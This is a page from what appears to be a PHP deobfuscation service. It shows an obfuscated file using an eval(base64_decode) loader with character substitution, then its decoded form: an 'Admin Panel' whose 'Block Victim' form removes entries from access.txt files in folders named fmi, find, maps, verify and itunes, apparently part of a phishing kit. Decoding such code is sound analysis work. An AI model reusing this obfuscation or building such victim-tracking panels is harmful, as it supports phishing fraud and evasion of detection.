Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_F=__FILE__;$_X='Pz48P3BocA0KZjNuY3Q0Mm4gcjVwbDFjNV9zdHI0bmdfNG5fZjRsNSgkZjRsNW4xbT..

Decoded Output download

?><?php
function replace_string_in_file($filename, $string_to_replace, $replace_with) {
    $content = file_get_contents($filename);
    $content_chunks = explode($string_to_replace, $content);
    $content = implode($replace_with, $content_chunks);
    file_put_contents($filename, $content);
}
echo "

" . '<!DOCTYPE html>' . "
" . '<html >' . "
" . '<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">' . "
" . '  ' . "
" . '  <title>Admin Panel</title>' . "
" . '  ' . "
" . '      <link rel="stylesheet" href="style1.css">' . "
" . '<meta name="viewport" content="initial-scale=1, maximum-scale=1">' . "
" . '  ' . "
" . '</head>' . "

" . '<body>' . "
" . '<br><br>' . "
" . '  <h1></h1>' . "

" . '<div class="btn-container">' . "

" . '<h2 style="color:#fff" ></h2>' . "

" . '<br><br>' . "
" . '         <form name="form" method="post">' . "
" . '            <input type="text" name="text_box" style="font-size:14pt;height:30px;width:300px;"/>' . "
" . '            <br><br>' . "
" . '            <input type="submit" id="search-submit" class="btn" value="Block Victim" />' . "
" . '        </form>' . "
" . '        ' . "	
		";
if (isset($_POST['text_box'])) {
    $a = $_POST['text_box'];
    $filename = '../fmi/access.txt';
    $string_to_replace = $a;
    $replace_with = '';
    replace_string_in_file($filename, $string_to_replace, $replace_with);
    $a = $_POST['text_box'];
    $filename = '../find/access.txt';
    $string_to_replace = $a;
    $replace_with = '';
    replace_string_in_file($filename, $string_to_replace, $replace_with);
    $a = $_POST['text_box'];
    $filename = '../maps/access.txt';
    $string_to_replace = $a;
    $replace_with = '';
    replace_string_in_file($filename, $string_to_replace, $replace_with);
    $a = $_POST['text_box'];
    $filename = '../verify/access.txt';
    $string_to_replace = $a;
    $replace_with = '';
    replace_string_in_file($filename, $string_to_replace, $replace_with);
    $a = $_POST['text_box'];
    $filename = '../itunes/access.txt';
    $string_to_replace = $a;
    $replace_with = '';
    replace_string_in_file($filename, $string_to_replace, $replace_with);
    echo '<br><h3><font color="#fff">' . $threadinfo . ' Victim Blocked Successfully</font></h3>';
}
echo "


" . '</div>' . "

" . '  <script src=\'http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js\'></script>' . "

" . '  ' . "
" . '</body>' . "
" . '</html>' . "
";
?>

Did this file decode correctly?

Original Code

<?php $_F=__FILE__;$_X='Pz48P3BocA0KZjNuY3Q0Mm4gcjVwbDFjNV9zdHI0bmdfNG5fZjRsNSgkZjRsNW4xbTUsICRzdHI0bmdfdDJfcjVwbDFjNSwgJHI1cGwxYzVfdzR0aCkgew0KICAgICRjMm50NW50ID0gZjRsNV9nNXRfYzJudDVudHMoJGY0bDVuMW01KTsNCiAgICAkYzJudDVudF9jaDNua3MgPSA1eHBsMmQ1KCRzdHI0bmdfdDJfcjVwbDFjNSwgJGMybnQ1bnQpOw0KICAgICRjMm50NW50ID0gNG1wbDJkNSgkcjVwbDFjNV93NHRoLCAkYzJudDVudF9jaDNua3MpOw0KICAgIGY0bDVfcDN0X2MybnQ1bnRzKCRmNGw1bjFtNSwgJGMybnQ1bnQpOw0KfQ0KNWNoMiAiDQoNCiIgLiAnPCFET0NUWVBFIGh0bWw+JyAuICINCiIgLiAnPGh0bWwgPicgLiAiDQoiIC4gJzxoNTFkPjxtNXQxIGh0dHAtNXEzNHY9IkMybnQ1bnQtVHlwNSIgYzJudDVudD0idDV4dC9odG1sOyBjaDFyczV0PTN0Zi04Ij4nIC4gIg0KIiAuICcgICcgLiAiDQoiIC4gJyAgPHQ0dGw1PkFkbTRuIFAxbjVsPC90NHRsNT4nIC4gIg0KIiAuICcgICcgLiAiDQoiIC4gJyAgICAgIDxsNG5rIHI1bD0ic3R5bDVzaDU1dCIgaHI1Zj0ic3R5bDU2LmNzcyI+JyAuICINCiIgLiAnPG01dDEgbjFtNT0idjQ1d3AycnQiIGMybnQ1bnQ9IjRuNHQ0MWwtc2MxbDU9NiwgbTF4NG0zbS1zYzFsNT02Ij4nIC4gIg0KIiAuICcgICcgLiAiDQoiIC4gJzwvaDUxZD4nIC4gIg0KDQoiIC4gJzxiMmR5PicgLiAiDQoiIC4gJzxicj48YnI+JyAuICINCiIgLiAnICA8aDY+PC9oNj4nIC4gIg0KDQoiIC4gJzxkNHYgY2wxc3M9ImJ0bi1jMm50MTRuNXIiPicgLiAiDQoNCiIgLiAnPGhhIHN0eWw1PSJjMmwycjojZmZmIiA+PC9oYT4nIC4gIg0KDQoiIC4gJzxicj48YnI+JyAuICINCiIgLiAnICAgICAgICAgPGYycm0gbjFtNT0iZjJybSIgbTV0aDJkPSJwMnN0Ij4nIC4gIg0KIiAuICcgICAgICAgICAgICA8NG5wM3QgdHlwNT0idDV4dCIgbjFtNT0idDV4dF9iMngiIHN0eWw1PSJmMm50LXM0ejU6NnVwdDtoNTRnaHQ6bzBweDt3NGR0aDpvMDBweDsiLz4nIC4gIg0KIiAuICcgICAgICAgICAgICA8YnI+PGJyPicgLiAiDQoiIC4gJyAgICAgICAgICAgIDw0bnAzdCB0eXA1PSJzM2JtNHQiIDRkPSJzNTFyY2gtczNibTR0IiBjbDFzcz0iYnRuIiB2MWwzNT0iQmwyY2sgVjRjdDRtIiAvPicgLiAiDQoiIC4gJyAgICAgICAgPC9mMnJtPicgLiAiDQoiIC4gJyAgICAgICAgJyAuICIJDQoJCSI7DQo0ZiAoNHNzNXQoJF9QT1NUWyd0NXh0X2IyeCddKSkgew0KICAgICQxID0gJF9QT1NUWyd0NXh0X2IyeCddOw0KICAgICRmNGw1bjFtNSA9ICcuLi9mbTQvMWNjNXNzLnR4dCc7DQogICAgJHN0cjRuZ190Ml9yNXBsMWM1ID0gJDE7DQogICAgJHI1cGwxYzVfdzR0aCA9ICcnOw0KICAgIHI1cGwxYzVfc3RyNG5nXzRuX2Y0bDUoJGY0bDVuMW01LCAkc3RyNG5nX3QyX3I1cGwxYzUsICRyNXBsMWM1X3c0dGgpOw0KICAgICQxID0gJF9QT1NUWyd0NXh0X2IyeCddOw0KICAgICRmNGw1bjFtNSA9ICcuLi9mNG5kLzFjYzVzcy50eHQnOw0KICAgICRzdHI0bmdfdDJfcjVwbDFjNSA9ICQxOw0KICAgICRyNXBsMWM1X3c0dGggPSAnJzsNCiAgICByNXBsMWM1X3N0cjRuZ180bl9mNGw1KCRmNGw1bjFtNSwgJHN0cjRuZ190Ml9yNXBsMWM1LCAkcjVwbDFjNV93NHRoKTsNCiAgICAkMSA9ICRfUE9TVFsndDV4dF9iMngnXTsNCiAgICAkZjRsNW4xbTUgPSAnLi4vbTFwcy8xY2M1c3MudHh0JzsNCiAgICAkc3RyNG5nX3QyX3I1cGwxYzUgPSAkMTsNCiAgICAkcjVwbDFjNV93NHRoID0gJyc7DQogICAgcjVwbDFjNV9zdHI0bmdfNG5fZjRsNSgkZjRsNW4xbTUsICRzdHI0bmdfdDJfcjVwbDFjNSwgJHI1cGwxYzVfdzR0aCk7DQogICAgJDEgPSAkX1BPU1RbJ3Q1eHRfYjJ4J107DQogICAgJGY0bDVuMW01ID0gJy4uL3Y1cjRmeS8xY2M1c3MudHh0JzsNCiAgICAkc3RyNG5nX3QyX3I1cGwxYzUgPSAkMTsNCiAgICAkcjVwbDFjNV93NHRoID0gJyc7DQogICAgcjVwbDFjNV9zdHI0bmdfNG5fZjRsNSgkZjRsNW4xbTUsICRzdHI0bmdfdDJfcjVwbDFjNSwgJHI1cGwxYzVfdzR0aCk7DQogICAgJDEgPSAkX1BPU1RbJ3Q1eHRfYjJ4J107DQogICAgJGY0bDVuMW01ID0gJy4uLzR0M241cy8xY2M1c3MudHh0JzsNCiAgICAkc3RyNG5nX3QyX3I1cGwxYzUgPSAkMTsNCiAgICAkcjVwbDFjNV93NHRoID0gJyc7DQogICAgcjVwbDFjNV9zdHI0bmdfNG5fZjRsNSgkZjRsNW4xbTUsICRzdHI0bmdfdDJfcjVwbDFjNSwgJHI1cGwxYzVfdzR0aCk7DQogICAgNWNoMiAnPGJyPjxobz48ZjJudCBjMmwycj0iI2ZmZiI+JyAuICR0aHI1MWQ0bmYyIC4gJyBWNGN0NG0gQmwyY2s1ZCBTM2NjNXNzZjNsbHk8L2YybnQ+PC9obz4nOw0KfQ0KNWNoMiAiDQoNCg0KIiAuICc8L2Q0dj4nIC4gIg0KDQoiIC4gJyAgPHNjcjRwdCBzcmM9XCdodHRwOi8vY2RuanMuY2wyM2RmbDFyNS5jMm0vMWoxeC9sNGJzL2pxMzVyeS9hLjYuby9qcTM1cnkubTRuLmpzXCc+PC9zY3I0cHQ+JyAuICINCg0KIiAuICcgICcgLiAiDQoiIC4gJzwvYjJkeT4nIC4gIg0KIiAuICc8L2h0bWw+JyAuICINCiI7DQo/Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

Function Calls

strtr 1
ereg_replace 1
base64_decode 2

Variables

$_F index.php
$_R 0
$_X 0

Stats

MD5 e7d7ddae6e135f59518a48b1dd6be4a4
Eval Count 2
Decode Time 52 ms